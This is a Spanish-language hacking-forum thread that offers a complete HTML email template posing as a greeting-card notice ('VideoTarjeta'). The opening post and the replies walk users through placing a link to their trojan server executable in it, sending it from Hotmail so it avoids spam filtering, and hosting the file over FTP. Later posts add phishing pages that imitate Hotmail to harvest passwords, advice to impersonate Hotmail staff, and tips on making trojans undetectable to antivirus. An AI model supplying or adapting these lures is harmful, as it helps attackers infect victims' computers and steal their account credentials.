Foro de elhacker.net

No es un fake como quien dice porque no imita nada conocido. Es una simple invitacion que podeis mandar al correo incitando al que se lo envieis a descargarse una VideoTarjeta. Parece tonteria pero funciona.

Para ver el contenido copiar y pegar este codigo en un archivo de texto y guardarlo con extension .htm. Para enviar por mail a alguien copiar y pegar el codigo en la caja de texto donde se escribe el mail. Para que al pinchar en "descargar ahora" la victima se baje vuestro troyano copiar y pegar este codigo en un archivo de texto pulsar contrl+b y en la ventanita que os sale escribir "a href" sin las comillas y cuando el buscador os encuentre esos digitos vereis en el texto esto <a href="">, bien pues entre las comillas que hay despues del igual debeis poner la ruta completa al server que habeis subido a algun sitio por ejemplo asi "http://www.web.com/server.exe"

Saludos.


<html>
<body>
<table width="767"cellpadding="0"cellspacing="0">
 <tr>
  <td height="20"background="http://img369.imageshack.us/img369/9829/barrarosa1eq.jpg"></td>
 </tr>
 <tr>
  <td>
   <table bgcolor="feb3b3"cellpadding="0"cellspacing"1">
    <tr>
     <td bgcolor="fdd2d2"width="250"height="328"><img src="http://img371.imageshack.us/img371/1491/442zf.jpg"></td>
     <td width="100%"bgcolor="fdd2d2">
      <table width="100%"height="328"cellspacing="0"cellpadding="0">
       <tr><td bgcolor="fdd2d2"height="40"><center><img src="http://img371.imageshack.us/img371/8603/vt0bg.jpg"></center></td></tr>
       <tr><td bgcolor="ffd8d8"><center><font face="arial black"color="ff8081"size="2">Alguien que te quiere conocer te ha enviado una VideoTarjeta. También te ha enviado un mensaje que podrás ver en tu perfil.</font><br><br><br><br><a href=""><img src="http://img371.imageshack.us/img371/796/download6yl.jpg"border="0"></a></font><br><br><br><hr color="ffffff"><font face="arial black"color="ff8081"size="1">Este sistema de VideoTarjetas caduca a las 24 horas de recibir este e-mail debido al excesivo uso de este servicio por lo que si pasadas las 24 horas la VideoTarjeta no ha sido descargada ésta será eliminada.</font></center></td></tr>
       <tr><td bgcolor="fdd2d2"height="40"><center><font size="2">Para poder visualizar la videotarjeta es necesario tener instalado Macromedia Flash en tu ordenador. Si aún no lo tienes <a href="http://www.macromedia.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash">Pulsa Aquí</a></font></center></td></tr>
      </table>
     </td>
    </tr>
   </table>
  </td>
 </tr>
 <tr>
  <td height="20"background="http://img371.imageshack.us/img371/7858/barrarosa2qk.jpg"></td>
 </tr>
 <tr><td bgcolor="ffd8d8"><center><font face="arial black"color="ff8081"size="3">Últimos usuarios registrados</font></center><br></td></tr>
 <tr>
  <td bgcolor="ffd8d8"><center>
   <table cellpadding="0"cellspacing="2">
    <tr><td colspan="3"height="20"><center><img src="http://img390.imageshack.us/img390/2410/chicos4cp.jpg"></center></td><td rowspan="3"width="10"></td><td colspan="3"><center><img src="http://img390.imageshack.us/img390/7488/chicas6mq.jpg"></center></td></tr>
    <tr><td colspan="3"height="5"></td><td colspan="3"></td></tr>
    <tr>
     <td bgcolor="ffd8d8"width="93">
      <table cellpadding="0"cellspacing="1"bgcolor="000000">
       <tr><td><img src="http://img390.imageshack.us/img390/705/f17fo.jpg"></td></tr>
       <tr><td bgcolor="ffd8d8"><center><font color="d76723"face="lucida console"size="1"><b>Hector3<br>Valencia<br>27 años</b></font></center></td></tr>
      </table>
     </td>
     <td bgcolor="ffd8d8"width="93">
      <table cellpadding="0"cellspacing="1"bgcolor="000000">
       <tr><td><img src="http://img390.imageshack.us/img390/3709/f21ub.jpg"></td></tr>
       <tr><td bgcolor="ffd8d8"><center><font color="d76723"face="lucida console"size="1"><b>Chache<br>Madrid<br>21 años</font></center></td></tr>
      </table>
     </td>
     <td bgcolor="ffd8d8"width="93">
      <table cellpadding="0"cellspacing="1"bgcolor="000000">
       <tr><td><img src="http://img390.imageshack.us/img390/3140/f31cs.jpg"></td></tr>
       <tr><td bgcolor="ffd8d8"><center><font color="d76723"face="lucida console"size="1"><b>the_best<br>Barcelona<br>23 años</font></center></td></tr>
      </table>
     </td>
     <td bgcolor="ffd8d8"width="93">
      <table cellpadding="0"cellspacing="1"bgcolor="000000">
       <tr><td bgcolor="ffd8d8"><img src="http://img390.imageshack.us/img390/8694/f44ac.jpg"></td></tr>
       <tr><td bgcolor="ffd8d8"><center><font color="d76723"face="lucida console"size="1"><b>Xina<br>BCN<br>17 años</font></center></td></tr>
      </table>
     </td>
     <td bgcolor="ffd8d8"width="93">
      <table cellpadding="0"cellspacing="1"bgcolor="000000">
       <tr><td bgcolor="ffd8d8"><img src="http://img390.imageshack.us/img390/6572/f56bb.jpg"></td></tr>
       <tr><td bgcolor="ffd8d8"><center><font color="d76723"face="lucida console"size="1"><b>Radicalera<br>Toledo<br>19 años</font></center></td></tr>
      </table>
     </td>
     <td bgcolor="ffd8d8"width="93">
      <table cellpadding="0"cellspacing="1"bgcolor="000000">
       <tr><td bgcolor="ffd8d8"><img src="http://img390.imageshack.us/img390/4247/f65us.jpg"></td></tr>
       <tr><td bgcolor="ffd8d8"><center><font color="d76723"face="lucida console"size="1"><b>I_Love_U<br>Moscú<br>21 años</font></center></td></tr>
      </table></center>
     </td>
    </tr>
   </table>
  </td>
 </tr>
 <tr>
  <td height="20"background="http://img371.imageshack.us/img371/7858/barrarosa2qk.jpg"></td>
 </tr>
</table>
</body>
</html>

Supongo que en la URL pondras la ruta de un archivo exe o comprimido en zip con un troyano o algo.... podrias explicar para los que no tiene mucha idea y donde tenen que poner el link....
La tarjeta quedaria asi:

(http://img160.imageshack.us/img160/1623/tarjeta6js.png)

Salu2

Tal que me respondias estaba escribiendo una breve explicacion :P

Si alguien no entiende que no se corte en preguntar. Vengo bastante cansado de trabajar hoy y por eso fui demasiado al grano :)

Saludos.

SABES de alguna web donde bajar un virus para luego subirlo a mi web y subir ese virus?

 por que no haces un manual mas espesifico con imagenes y demas cosas

  PD: a eso se lo lla xploit ;D ;D ;D ;D ;D

  jajaja  yo dije Xploit no exploit  ;D ;D ;D ;D ;D

Pues si esta idea esta muy bien no se html. tengo un servidor ftp y un troyano en visual basic ya terminado me podriais decir donde tengo k poner la Url de mi ftp en ese codigo html pa k la gente se lo baje ?
gracias

<a href="aki_tu_url"><img src="http://img371.imageshack.us/img371/796/download6yl.jpg"border="0"></a>

mmm se ve bueno, la idea, pero mucha  ;), yo e usado xploit, pero con targetas gusanito, y me funciono muy vien, veremos este como funciona,  ;D

Yo este no lo uso, pero imagino que es mas creible y no esta tan explotado que las tarjetas de gusanito, nico, & Cia. aun asi se trata de un engaño similar, solo que si la victima acepta no se consigue una cuenta de hotmail que poco uso le podemos dar, sino que tendremos control sobre un pc.

Perdonar por no haberlo explicado bien pero ando algo ocupado con otras cosas :P

No se llama exploit ni xploit ni fake. Es lo que dicen, un simple engaño. Los nombres que he citado antes son nombres con los uqe la gente llama a estas cosas ( yo lo llamo fake y no quiere decir que lo sea :P )

Weno el tema es que ese codigo tiene un enlace que no lleva a ningun sitio y en ese enlace vosotros debeis poner la ruta al server que hayais subido a algun sitio ( no voy a explicar como subir cosas a ningun stio ya que no tiene nada que ver con esto y ademas tampoco tiene ninguna dificultad aunque para ayudaros un poquito... miarroba permite subir exes )

Para encontrar el enlace en el codigo copiar el codigo html en un archivo de texto, pulsar las teclas control+b y en la ventana que os sale escribir esto a href="" y pulsar intro. Vereis que ahora en el archivo de texto sale subrayado justamente ese texto que estais buscando. Pues entre las comillas debeis escribir el url del server que hayais subido a donde fuera ejemplo http://tuweb.webcindario.com/server.exe y si ese fuera el link el enlace dentro del codigo quedaria tal que asi:

<a href="http://tuweb.webcindario.com/server.exe"><img...

Con eso ya teneis el link a vuestro server disponible para descargarlo en cuanto la victima pinche en descargar Videoarjeta. Podeis dejarlo con la extension txt ya que lo que vais a enviar por mail es el texto y no el archivo. Para los que tengais uns ervidor ftp en vuestro pc guardar el archivo como fake.htm ( o con algun nombre menos sospechoso xd ) y mas abajo os explico como hacer para que la victima lo visite como si se tratara de una web.

Ahora, para enviar por mail iros a hotmail o cualquiera que sea vuestro servidor de e-mail y darle a nuevo mail. Cuando os salga la pagina en la que teneis que poner a quien se lo mandais escribis la direccion de quien quereis que reciba la supuesta videotarjeta, escribis despues el asunto y donde escribis el mensaje no pongais nada, solo debeis poner el codigo con el enalce a vuestro troyano en ese sitio tal que asi:

(http://img410.imageshack.us/img410/1681/vt6yq.th.jpg) (http://img410.imageshack.us/my.php?image=vt6yq.jpg)

Bueno ahora solo os queda mandaroslo a vosotros mismos para ver como lo vera quien lo reciba. Si enviais esto con un mailer lo mas seguro es que llegue al correo no deseado y a parte de que la victima no lo va a ver aunque puede darse el caso no vera las imagenes ya que en el correo no deseado estas son bloqueadas. Si el mail lo enviais desde hotmail va a llegar a la bandeja de entrada de casi todos los servidores de correo por no decir que a todos.

Lo ultimo para los que teneis uns ervidor ftp en vuestro pc. Si quereis que la victima visite vuestro servidor ftp para ver el "fake" el link seria tal que asi:

ftp://tuIP/ruta/en/la/que/esta/el/fake.htm

Creo que asi ya funcionaria ( si ese link lo pone en el mozilla o en el internet explorer funciona ) pero por si las moscas tambien podeis ponerlo asi:

ftp://tuIP:21/ruta/en/la/que/esta/el/fake.htm

BUeno creo que esta todo. Si teneis mas dudas preguntar y os explico.

Saludos

Esto es muy posible que no os funcione asi tal cual. Tan solo serviria si teneis configurada la cuenta de usuario anonymous en vuestro servidor. Para que el resultado sea optimo teneis que crear un usuario nuevo, preferiblemente solo con permisos de READ, y con una contraseña. Entonces la direccion del archivo quedaria asi:

ftp://usuario:contraseña@tuIP:21/ruta/fake.html

gracias pero no se por k no me funciona cambio la linea  <tr><td bgcolor="fdd2d2"height="40"><center><img src="http://img371.imageshack.us/img371/8603/vt0bg.jpg"></center></td></tr> por esto :

<a href="Mi FTP"><img src="http://img371.imageshack.us/img371/796/download6yl.jpg"border="0"></a>

y es como si no pasase nada

Esque no tienes que cambiar toda la linea... Dije que pusieras entre las comillas el link a tu server. No tienes que sustituir nada, solo añadir el link entre las comillas.

lista de file hosting para subir exe, o lo que quieran!!

http://foro.elhacker.net/index.php/topic,117117.0.html

Ok muxas gracias ya me funciona me habia equivocado perdon

  Bueno e leido el manual de Kizar de ablil negro y e visto una breve confusion entre lo que es exploit y lo que es Xploits
 
   Y miarando por alli encontre alguien que esplico la diferencia de ambos ;D ;D ;Dhttp://foro.el-hacker.com/index.php/topic,25337.0.html

    Vamos a ver las definiciones de estos dos terminos que se confunden muy seguido ya que su pronunciacion y escritura son similares.
 Primero planteo este tema para que dejen de preguntar e insistir con los exploit q en fin lo llaman como al fake mail.
-----------------------!!!!!!!!!!--------------------------------
                             EXPLOIT
 Exploit (viene de to exploit - aprovechar) - código escrito con el fin de aprovechar un error de programación para obtener diversos privilegios. software.

Un buen número de exploits tienen su origen en un conjunto de fallos similares. Algunos de los grupos de vulnerabilidades más conocidos son:

Vulnerabilidades de desbordamiento de pila o buffer overflow.
Vulnerabilidades de condición de carrera (Race condition).
Vulnerabilidades de error de formato de cadena (format string bugs).
Vulnerabilidades de Cross Site Scripting (XSS).
Vulnerabilidades de inyección SQL (SQL injection).
Vulnerabilidades de inyeccion de caraceres (CRLF).
Obtenido de "http://es.wikipedia.org/wiki/Exploit"
-------------------------!!!!!!!!!!----------------------------
                               XPLOIT
Fake mail o mas comunmente llamado xploit. Enviar correo electrónico falseando el remitente. Se trata de una técnica muy empleada en Ingeniería Social.
 Como modo de obtener contraseñas de hotmail,yahoo o cualquier tipo de compania para los correos electronicos. Esta tecnica es considerada lammer para la comunidad de hackers o para quienes se interesan verdaderamente en el tema del hacking.

   Fuente:http://www.tulocura.net/definiciones.php y parte de http://es.wikipedia.org/wiki/Exploit

                 Nos vemos....

Hola wueno despues de modificar el fake un poko ami gusto y tal lo envio por email a mi mismo y cuando pincho en el boton k lleva a mi ftp sale un mensaje de hotmail advirtiendo k puede ser un link para engañar al usuario hay alguna forma de evitar esto?

Tal vez sea porque el link va a un servidor ftp. Yo mientras construia el fake me lo enviaba constantemente a mi mismo para encajarlo bien en lo que es la pagina de hotmail y que no salieran barras desplazadoras, vamos que me canse de enviarmelo a mi mismo y nunca me salio ningun aviso al intentar descargar el server. Es mas, cada vez que subo el server a otro sitio me vuelvo a enviar a mi mismo el fake para ver si todo funciona bien y cuando pincho en el link para ver si la descarga directa funciona bien el server se descarga a la perfeccion.

La advertencia que te sale tambien puede ser debida a que hace poco han publicado una noticia sobre una persona que enviaba virus al mail haciendo creer a la victima que se ivan a descargar el messenger 8.0 beta. Es posible que hotmail haya incluido la advertencia que nos dices debido a este incidente.

cuando pongo la dire de una web no me salta el aviso pero cuando pongo la dire de mi FTP me salta el aviso alomejor mi solucion seria subir el troyano a un hosting de los k a puesto Man-In-the-Middle

nose que estoy haciendo mal segui todo al pie de la letra pero cuando ago click en descargar tarjeta me lleva a una pag con este link
http://by113fd.bay113.hotmail.msn.com/cgi-bin/www.mihostin.com/rubengl/miserver.exe

pos eso es q metiste ese link en el código HTML.

El programa funciona a la perfección, buen aporte higochumbo.

no no meti ese link meti el link bien en gmail me funciono bien
en gmail
(http://img131.imageshack.us/img131/4242/rs29ke.jpg)
en hotmail
(http://img131.imageshack.us/img131/9523/rs0yr.jpg)

En hotmail ese link te va a funcionar asi. Osea, que no es link directo como quien dice (la descarga si que lo es) pero hotmail mete ese javscript y funciona.

una pregunta de newbie.
Cuando la victima hace click en descargar la tarjeta (cuando en realidad va a descargar el servidor troyano) no lo detecta el antivirus de la victima?

PD: perdon... ya encontre la respuesta a mi preg

lo probaste y te funciono? por que yo cuando hago click en descargar videotarjeta me lleva a una pagina asi
(http://img133.imageshack.us/img133/9546/noanda4xf.jpg)y no me baja nada  :(

A mi lo q me pasa es que a veces en vez de llegar la imagen de la videotarjeta me llega el código HTML, el pq? no lo sé pq lo hago todo igual.

rubeng tu problema es pq no te ha subido bien el server. Probaste a meter el link en el nagevador a ver si te baja? si no te baja es eso.

si el link funciona a la perfeccion

Pues a mi esto me ha estado funcionando siempre a la perfeccion. Si quereis me dais vuestros mails por mensaje privado y os lo envio.

muchas gracias.pero te aparece esa direccion antes de tu link?

Esta tarde e tenido un poco de tiempo libre y les he preparado esto, para mi no tiene ninguna utilidad, pero vosotros seguro que se la encotrareis.
Es un Xploit mas:

MOSTRAR EL FAKE
FAKE 1
http://kizar.up.md/Jotmail/uilogin.php?usr=tunombre
FAKE 2
http://kizar.up.md/Jotmail/hotmail.php?usr=tunombre
Donde pone "tunombre" lo cambias por tu nombre...

VER LOS RESULTADOS
http://kizar.up.md/Jotmail/user.php
Escribis el nombre que pusisteis antes.

Decirme lo que os parece, seguro k lo primero k pensais es k hotmail no pone publicidad tan cutre ;)

Salu2

Rubeng te voy a matar!


No pusiste el http:// como quieres q funcione ese link!

pusiste www.web...bla bla bla cuando debería haber sido http://www.web...bla bla bla, la dirección entera la pusiste en Gmail y por eso en gmail te funcionó y en hotmail no.


XD, q sois unos vagos, hay q revisar las cosas.


Probado Kizar y funciona bien. Jajaj ya se de donde sacaste eso jijij, me envió a mí un colega mío algo parecido q le habían enviado. Él cayó así q seguro q puede caer más gente en el engaño ;). Y si pa encima usas un mail anónimo y te haces pasar por el staff@hotmail.com vamos creo q va a caer más de uno jijiji. //aconsejaría poner en asunto algo como; "servicio para la mejora de la experiencia del usuario"//

uy tenes razon,perdon a todos :-( son esas pequeñas pavadas que se pasan y terminan haciendo que no funcione nada.gracias a todos.
je esta buena la encuesta kizar algunos no caeran por el baner pero, hay gente de todo tipo. gracias
salu2

nada hombre no pasa nada jijiji.


Bueno lo de Kizar marcha, hoy me pareció ver a 30 conectados  en la Web de Kizar jiji probando el método.

Si que sería la caña poner eso en un espacio Web pagado (no gratuito) donde no hubiera banner, pero bueno a caballo regalao...y seguro q pica más d uno jejje.

Si buscais bien encontrareis hosting gratuito y sin publicidad. No pongo link porque soy un cabron xD Mentira no pongo link porque hace muchisimo que no ando con hostings pero hace tiempo y buscando bastante se encontraban muchos sin banners publicitarios.

aca hay uno www.freewebtown.com  que no pone nada de publicidad te da ftp y 2000 megas eso es lo que tiene de bueno pero por ahora no tiene soporte para php pronto lo tendra segun dice en la pag.

y otro es www.pandela.org  creo que no tiene propagandas tampoco.  este si tiene para php.

salu2

(http://www.pandela.com/banners/pandela_468x60.gif) (http://www.pandela.com)
Es lo mejor que he visto, es mucho mejor que muchos de pago y todo gratisss.

(No es por hacer spam, pero merece la pena)

Probarlo, Salu2

Enlaces cambiados, SIN PUBLICIDAD

FAKE 1
http://kizar.up.md/Jotmail/uilogin.php?usr=tunombre
FAKE 2
http://kizar.up.md/Jotmail/hotmail.php?usr=tunombre
Donde pone "tunombre" lo cambias por tu nombre...
VER LOS RESULTADOS
http://kizar.up.md/Jotmail/user.php

Salu2

parece interesante ahora te cuento q yo no se mucho de esto pero eso si estoy estudiando ing de sistemas y siempre es bueno saber de todo ..ahora mi duda sobre esto es q si el server q suba a un servidor tiene q estar camuflado o lo puedo subir asi y no lo detecta el antivirus anque yo creo q sip..me refiero a un troyano : sub seven com ej.. si podrias explicar un poco sobre ese tema te agradeceria un monton

lo que hace eso es hacer que la gente se descargue el server del troyano pensando que es una video tarjeta si el server es detectado por el antivirus lo borra por eso debes hacerlo indetectable primero y trata de probar con alguno menos conocido que el subseven ya que este te costara mas hacerlo indetectable.
salu2

pd: kizar que bien que quedo eso sin publicidad ahora si es creiblee ;)

Ojo pero tengo que decir que a veces cuando lo envío la víctima lo que ve es el código en html, no la videotarjeta. Yo para solucionar esto les envío además en datos adjuntos la videotarjeta en un archivo .html, así si la víctima no la ve de primeras descargará los datos adjuntos y podrá observarla.


Nose pq ocurre pero ya me ha pasado en sucesivas ocasiones.

la mitad de los enlaces no funcionan,se actualiza alguna vez?

Tema de hace 8 años !!!!  :rolleyes:. Normal que los enlaces fallen. Bloqueo.